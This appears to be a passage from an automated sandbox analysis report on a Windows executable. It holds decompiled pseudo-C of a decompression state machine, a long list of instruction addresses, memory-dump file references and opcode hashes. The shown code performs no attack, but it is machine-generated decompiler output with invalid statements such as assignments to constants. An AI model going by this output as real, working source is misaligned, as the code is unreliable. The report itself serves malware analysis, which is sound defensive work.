									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                    0x00000000
                                                                                    0x0040647d
                                                                                    0x0040647d
                                                                                    0x00406481
                                                                                    0x00406538
                                                                                    0x0040653b
                                                                                    0x00406547
                                                                                    0x00406428
                                                                                    0x00406428
                                                                                    0x0040642b
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067ec
                                                                                    0x00406813
                                                                                    0x00406813
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x004067ee
                                                                                    0x004067ee
                                                                                    0x004067f2
                                                                                    0x004069a1
                                                                                    0x00000000
                                                                                    0x004069a1
                                                                                    0x004067fe
                                                                                    0x00406805
                                                                                    0x0040680d
                                                                                    0x00406810
                                                                                    0x00000000
                                                                                    0x00406810
                                                                                    0x00406487
                                                                                    0x0040648b
                                                                                    0x004069cc
                                                                                    0x004069cc
                                                                                    0x004069cf
                                                                                    0x004069d3
                                                                                    0x004069d3
                                                                                    0x00406491
                                                                                    0x00406497
                                                                                    0x0040649a
                                                                                    0x0040649e
                                                                                    0x004064a1
                                                                                    0x004064a5
                                                                                    0x0040696b
                                                                                    0x004069b7
                                                                                    0x004069bf
                                                                                    0x004069c6
                                                                                    0x004069c8
                                                                                    0x00000000
                                                                                    0x004069c8
                                                                                    0x004064ab
                                                                                    0x004064ae
                                                                                    0x004064b4
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b9
                                                                                    0x004064bc
                                                                                    0x004064bf
                                                                                    0x004064c2
                                                                                    0x004064c5
                                                                                    0x004064c8
                                                                                    0x004064c9
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064ce
                                                                                    0x004064d1
                                                                                    0x004064d4
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064da
                                                                                    0x004064dc
                                                                                    0x004064dc
                                                                                    0x004064df
                                                                                    0x004064df
                                                                                    0x004064df
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fbe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x00000000
                                                                                    0x00405fcf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fd8
                                                                                    0x00405fdb
                                                                                    0x00405fde
                                                                                    0x00405fe2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fe8
                                                                                    0x00405feb
                                                                                    0x00405fed
                                                                                    0x00405fee
                                                                                    0x00405ff1
                                                                                    0x00405ff3
                                                                                    0x00405ff4
                                                                                    0x00405ff6
                                                                                    0x00405ff9
                                                                                    0x00405ffe
                                                                                    0x00406003
                                                                                    0x0040600c
                                                                                    0x0040601f
                                                                                    0x00406022
                                                                                    0x0040602e
                                                                                    0x00406056
                                                                                    0x00406058
                                                                                    0x00406066
                                                                                    0x00406066
                                                                                    0x0040606a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x0040605a
                                                                                    0x0040605d
                                                                                    0x0040605e
                                                                                    0x0040605e
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x00406034
                                                                                    0x00406039
                                                                                    0x00406039
                                                                                    0x00406042
                                                                                    0x0040604a
                                                                                    0x0040604d
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406070
                                                                                    0x00406070
                                                                                    0x00406074
                                                                                    0x00406920
                                                                                    0x00000000
                                                                                    0x00406920
                                                                                    0x0040607d
                                                                                    0x0040608d
                                                                                    0x00406090
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406096
                                                                                    0x0040609a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040609c
                                                                                    0x004060a2
                                                                                    0x004060cc
                                                                                    0x004060d2
                                                                                    0x004060d9
                                                                                    0x00000000
                                                                                    0x004060d9
                                                                                    0x004060a8
                                                                                    0x004060ab
                                                                                    0x004060b0
                                                                                    0x004060b0
                                                                                    0x004060bb
                                                                                    0x004060c3
                                                                                    0x004060c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040610b
                                                                                    0x00406111
                                                                                    0x00406114
                                                                                    0x00406121
                                                                                    0x00406129
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004060e0
                                                                                    0x004060e0
                                                                                    0x004060e4
                                                                                    0x0040692f
                                                                                    0x00000000
                                                                                    0x0040692f
                                                                                    0x004060f0
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fe
                                                                                    0x00406101
                                                                                    0x00406104
                                                                                    0x00406109
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406131
                                                                                    0x00406133
                                                                                    0x00406136
                                                                                    0x004061a7
                                                                                    0x004061aa
                                                                                    0x004061ad
                                                                                    0x004061b4
                                                                                    0x004061be
                                                                                    0x00000000
                                                                                    0x004061be
                                                                                    0x00406138
                                                                                    0x0040613c
                                                                                    0x0040613f
                                                                                    0x00406141
                                                                                    0x00406144
                                                                                    0x00406147
                                                                                    0x00406149
                                                                                    0x0040614c
                                                                                    0x0040614e
                                                                                    0x00406153
                                                                                    0x00406156
                                                                                    0x00406159
                                                                                    0x0040615d
                                                                                    0x00406164
                                                                                    0x00406167
                                                                                    0x0040616e
                                                                                    0x00406172
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x0040617e
                                                                                    0x00406181
                                                                                    0x0040619f
                                                                                    0x004061a1
                                                                                    0x00000000
                                                                                    0x00406183
                                                                                    0x00406183
                                                                                    0x00406186
                                                                                    0x00406189
                                                                                    0x0040618c
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x00406191
                                                                                    0x00406194
                                                                                    0x00406196
                                                                                    0x00406197
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x004063d0
                                                                                    0x004063d4
                                                                                    0x004063f2
                                                                                    0x004063f5
                                                                                    0x004063fc
                                                                                    0x004063ff
                                                                                    0x00406402
                                                                                    0x00406405
                                                                                    0x00406408
                                                                                    0x0040640b
                                                                                    0x0040640d
                                                                                    0x00406414
                                                                                    0x00406415
                                                                                    0x00406417
                                                                                    0x0040641a
                                                                                    0x0040641d
                                                                                    0x00406420
                                                                                    0x00406420
                                                                                    0x00406425
                                                                                    0x00000000
                                                                                    0x00406425
                                                                                    0x004063d6
                                                                                    0x004063d9
                                                                                    0x004063dc
                                                                                    0x004063e6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040643a
                                                                                    0x0040643e
                                                                                    0x00406461
                                                                                    0x00406464
                                                                                    0x00406467
                                                                                    0x00406471
                                                                                    0x00406440
                                                                                    0x00406440
                                                                                    0x00406443
                                                                                    0x00406446
                                                                                    0x00406449
                                                                                    0x00406456
                                                                                    0x00406459
                                                                                    0x00406459
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064ee
                                                                                    0x004064f2
                                                                                    0x004064f9
                                                                                    0x004064fc
                                                                                    0x004064ff
                                                                                    0x00406509
                                                                                    0x00000000
                                                                                    0x00406509
                                                                                    0x004064f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406515
                                                                                    0x00406519
                                                                                    0x00406520
                                                                                    0x00406523
                                                                                    0x00406526
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x00406529
                                                                                    0x0040652c
                                                                                    0x0040652f
                                                                                    0x0040652f
                                                                                    0x00406532
                                                                                    0x00406535
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004065d5
                                                                                    0x004065d5
                                                                                    0x004065d9
                                                                                    0x00406977
                                                                                    0x00000000
                                                                                    0x00406977
                                                                                    0x004065df
                                                                                    0x004065e2
                                                                                    0x004065e5
                                                                                    0x004065e9
                                                                                    0x004065ec
                                                                                    0x004065f2
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f7
                                                                                    0x004065fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061ca
                                                                                    0x004061ca
                                                                                    0x004061ce
                                                                                    0x0040693b
                                                                                    0x00000000
                                                                                    0x0040693b
                                                                                    0x004061d4
                                                                                    0x004061d7
                                                                                    0x004061da
                                                                                    0x004061de
                                                                                    0x004061e1
                                                                                    0x004061e7
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061ec
                                                                                    0x004061ef
                                                                                    0x004061ef
                                                                                    0x004061f2
                                                                                    0x004061f5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061fb
                                                                                    0x00406201
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406207
                                                                                    0x00406207
                                                                                    0x0040620b
                                                                                    0x0040620e
                                                                                    0x00406211
                                                                                    0x00406214
                                                                                    0x00406217
                                                                                    0x00406218
                                                                                    0x0040621b
                                                                                    0x0040621d
                                                                                    0x00406223
                                                                                    0x00406226
                                                                                    0x00406229
                                                                                    0x0040622c
                                                                                    0x0040622f
                                                                                    0x00406232
                                                                                    0x00406235
                                                                                    0x00406251
                                                                                    0x00406254
                                                                                    0x00406257
                                                                                    0x0040625a
                                                                                    0x00406261
                                                                                    0x00406265
                                                                                    0x00406267
                                                                                    0x0040626b
                                                                                    0x00406237
                                                                                    0x00406237
                                                                                    0x0040623b
                                                                                    0x00406243
                                                                                    0x00406248
                                                                                    0x0040624a
                                                                                    0x0040624c
                                                                                    0x0040624c
                                                                                    0x0040626e
                                                                                    0x00406275
                                                                                    0x00406278
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x00406283
                                                                                    0x00406283
                                                                                    0x00406287
                                                                                    0x00406947
                                                                                    0x00000000
                                                                                    0x00406947
                                                                                    0x0040628d
                                                                                    0x00406290
                                                                                    0x00406293
                                                                                    0x00406297
                                                                                    0x0040629a
                                                                                    0x004062a0
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a5
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062b0
                                                                                    0x004062b3
                                                                                    0x004062b6
                                                                                    0x004062b9
                                                                                    0x004062bc
                                                                                    0x004062bf
                                                                                    0x004062c2
                                                                                    0x004062c5
                                                                                    0x004062c8
                                                                                    0x004062cb
                                                                                    0x004062ce
                                                                                    0x004062e6
                                                                                    0x004062e9
                                                                                    0x004062ec
                                                                                    0x004062ef
                                                                                    0x004062ef
                                                                                    0x004062f2
                                                                                    0x004062f6
                                                                                    0x004062f8
                                                                                    0x004062d0
                                                                                    0x004062d0
                                                                                    0x004062d8
                                                                                    0x004062dd
                                                                                    0x004062df
                                                                                    0x004062e1
                                                                                    0x004062e1
                                                                                    0x004062fb
                                                                                    0x00406302
                                                                                    0x00406305
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00406305
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406347
                                                                                    0x00406347
                                                                                    0x0040634b
                                                                                    0x00406953
                                                                                    0x00000000
                                                                                    0x00406953
                                                                                    0x00406351
                                                                                    0x00406354
                                                                                    0x00406357
                                                                                    0x0040635b
                                                                                    0x0040635e
                                                                                    0x00406364
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406369
                                                                                    0x0040636c
                                                                                    0x0040636c
                                                                                    0x00406372
                                                                                    0x00406310
                                                                                    0x00406310
                                                                                    0x00406313
                                                                                    0x00000000
                                                                                    0x00406313
                                                                                    0x00406374
                                                                                    0x00406374
                                                                                    0x00406377
                                                                                    0x0040637a
                                                                                    0x0040637d
                                                                                    0x00406380
                                                                                    0x00406383
                                                                                    0x00406386
                                                                                    0x00406389
                                                                                    0x0040638c
                                                                                    0x0040638f
                                                                                    0x00406392
                                                                                    0x004063aa
                                                                                    0x004063ad
                                                                                    0x004063b0
                                                                                    0x004063b3
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063ba
                                                                                    0x004063bc
                                                                                    0x00406394
                                                                                    0x00406394
                                                                                    0x0040639c
                                                                                    0x004063a1
                                                                                    0x004063a3
                                                                                    0x004063a5
                                                                                    0x004063a5
                                                                                    0x004063bf
                                                                                    0x004063c6
                                                                                    0x004063c9
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x00406658
                                                                                    0x00406658
                                                                                    0x0040665c
                                                                                    0x00406983
                                                                                    0x00000000
                                                                                    0x00406983
                                                                                    0x00406662
                                                                                    0x00406665
                                                                                    0x00406668
                                                                                    0x0040666c
                                                                                    0x0040666f
                                                                                    0x00406675
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x0040667a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406767
                                                                                    0x0040676b
                                                                                    0x0040678d
                                                                                    0x00406790
                                                                                    0x0040679a
                                                                                    0x00000000
                                                                                    0x0040679a
                                                                                    0x0040676d
                                                                                    0x00406770
                                                                                    0x00406774
                                                                                    0x00406777
                                                                                    0x00406777
                                                                                    0x0040677a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406824
                                                                                    0x00406828
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x0040684d
                                                                                    0x00406854
                                                                                    0x0040685b
                                                                                    0x0040685b
                                                                                    0x00000000
                                                                                    0x0040685b
                                                                                    0x0040682a
                                                                                    0x0040682d
                                                                                    0x00406830
                                                                                    0x00406833
                                                                                    0x0040683a
                                                                                    0x0040677e
                                                                                    0x0040677e
                                                                                    0x00406781
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406915
                                                                                    0x00406918
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040654f
                                                                                    0x00406551
                                                                                    0x00406558
                                                                                    0x00406559
                                                                                    0x0040655b
                                                                                    0x0040655e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406566
                                                                                    0x00406569
                                                                                    0x0040656c
                                                                                    0x0040656e
                                                                                    0x00406570
                                                                                    0x00406570
                                                                                    0x00406571
                                                                                    0x00406574
                                                                                    0x0040657b
                                                                                    0x0040657e
                                                                                    0x0040658c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406862
                                                                                    0x00406862
                                                                                    0x00406865
                                                                                    0x0040686c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406871
                                                                                    0x00406871
                                                                                    0x00406875
                                                                                    0x004069ad
                                                                                    0x00000000
                                                                                    0x004069ad
                                                                                    0x0040687b
                                                                                    0x0040687e
                                                                                    0x00406881
                                                                                    0x00406885
                                                                                    0x00406888
                                                                                    0x0040688e
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406893
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406899
                                                                                    0x00406899
                                                                                    0x0040689d
                                                                                    0x004068fd
                                                                                    0x00406900
                                                                                    0x00406905
                                                                                    0x00406906
                                                                                    0x00406908
                                                                                    0x0040690a
                                                                                    0x0040690d
                                                                                    0x00000000
                                                                                    0x0040690d
                                                                                    0x0040689f
                                                                                    0x004068a5
                                                                                    0x004068a8
                                                                                    0x004068ab
                                                                                    0x004068ae
                                                                                    0x004068b1
                                                                                    0x004068b4
                                                                                    0x004068b7
                                                                                    0x004068ba
                                                                                    0x004068bd
                                                                                    0x004068c0
                                                                                    0x004068d9
                                                                                    0x004068dc
                                                                                    0x004068df
                                                                                    0x004068e2
                                                                                    0x004068e6
                                                                                    0x004068e8
                                                                                    0x004068e8
                                                                                    0x004068e9
                                                                                    0x004068ec
                                                                                    0x004068c2
                                                                                    0x004068c2
                                                                                    0x004068ca
                                                                                    0x004068cf
                                                                                    0x004068d1
                                                                                    0x004068d4
                                                                                    0x004068d4
                                                                                    0x004068ef
                                                                                    0x004068f6
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x00406594
                                                                                    0x00406597
                                                                                    0x004065cd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x00406700
                                                                                    0x00406700
                                                                                    0x00406703
                                                                                    0x00406705
                                                                                    0x0040698f
                                                                                    0x00000000
                                                                                    0x0040698f
                                                                                    0x0040670b
                                                                                    0x0040670e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406714
                                                                                    0x00406718
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x00000000
                                                                                    0x0040671b
                                                                                    0x00406599
                                                                                    0x0040659b
                                                                                    0x0040659d
                                                                                    0x0040659f
                                                                                    0x004065a2
                                                                                    0x004065a3
                                                                                    0x004065a5
                                                                                    0x004065a7
                                                                                    0x004065aa
                                                                                    0x004065ad
                                                                                    0x004065c3
                                                                                    0x004065c8
                                                                                    0x00406600
                                                                                    0x00406600
                                                                                    0x00406604
                                                                                    0x00406630
                                                                                    0x00406632
                                                                                    0x00406639
                                                                                    0x0040663c
                                                                                    0x0040663f
                                                                                    0x0040663f
                                                                                    0x00406644
                                                                                    0x00406644
                                                                                    0x00406646
                                                                                    0x00406649
                                                                                    0x00406650
                                                                                    0x00406653
                                                                                    0x00406680
                                                                                    0x00406680
                                                                                    0x00406683
                                                                                    0x00406686
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x00000000
                                                                                    0x004066fa
                                                                                    0x00406688
                                                                                    0x0040668e
                                                                                    0x00406691
                                                                                    0x00406694
                                                                                    0x00406697
                                                                                    0x0040669a
                                                                                    0x0040669d
                                                                                    0x004066a0
                                                                                    0x004066a3
                                                                                    0x004066a6
                                                                                    0x004066a9
                                                                                    0x004066c2
                                                                                    0x004066c4
                                                                                    0x004066c7
                                                                                    0x004066c8
                                                                                    0x004066cb
                                                                                    0x004066cd
                                                                                    0x004066d0
                                                                                    0x004066d2
                                                                                    0x004066d4
                                                                                    0x004066d7
                                                                                    0x004066d9
                                                                                    0x004066dc
                                                                                    0x004066e0
                                                                                    0x004066e2
                                                                                    0x004066e2
                                                                                    0x004066e3
                                                                                    0x004066e6
                                                                                    0x004066e9
                                                                                    0x004066ab
                                                                                    0x004066ab
                                                                                    0x004066b3
                                                                                    0x004066b8
                                                                                    0x004066ba
                                                                                    0x004066bd
                                                                                    0x004066bd
                                                                                    0x004066ec
                                                                                    0x004066f3
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x004066f3
                                                                                    0x00406606
                                                                                    0x00406609
                                                                                    0x0040660b
                                                                                    0x0040660e
                                                                                    0x00406611
                                                                                    0x00406614
                                                                                    0x00406616
                                                                                    0x00406619
                                                                                    0x0040661c
                                                                                    0x0040661c
                                                                                    0x0040661f
                                                                                    0x0040661f
                                                                                    0x00406622
                                                                                    0x00406629
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00406629
                                                                                    0x004065af
                                                                                    0x004065b2
                                                                                    0x004065b4
                                                                                    0x004065b7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406316
                                                                                    0x00406316
                                                                                    0x0040631a
                                                                                    0x0040695f
                                                                                    0x00000000
                                                                                    0x0040695f
                                                                                    0x00406320
                                                                                    0x00406323
                                                                                    0x00406326
                                                                                    0x00406329
                                                                                    0x0040632c
                                                                                    0x0040632f
                                                                                    0x00406332
                                                                                    0x00406334
                                                                                    0x00406337
                                                                                    0x0040633a
                                                                                    0x0040633d
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x00406722
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406728
                                                                                    0x0040672b
                                                                                    0x0040672e
                                                                                    0x00406731
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406736
                                                                                    0x00406739
                                                                                    0x0040673c
                                                                                    0x0040673f
                                                                                    0x00406742
                                                                                    0x00406745
                                                                                    0x00406746
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x0040674b
                                                                                    0x0040674e
                                                                                    0x00406751
                                                                                    0x00406754
                                                                                    0x00406757
                                                                                    0x0040675b
                                                                                    0x0040675d
                                                                                    0x00406760
                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x00406760
                                                                                    0x00406995
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                    • Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
                                                                                    • Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                    • Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
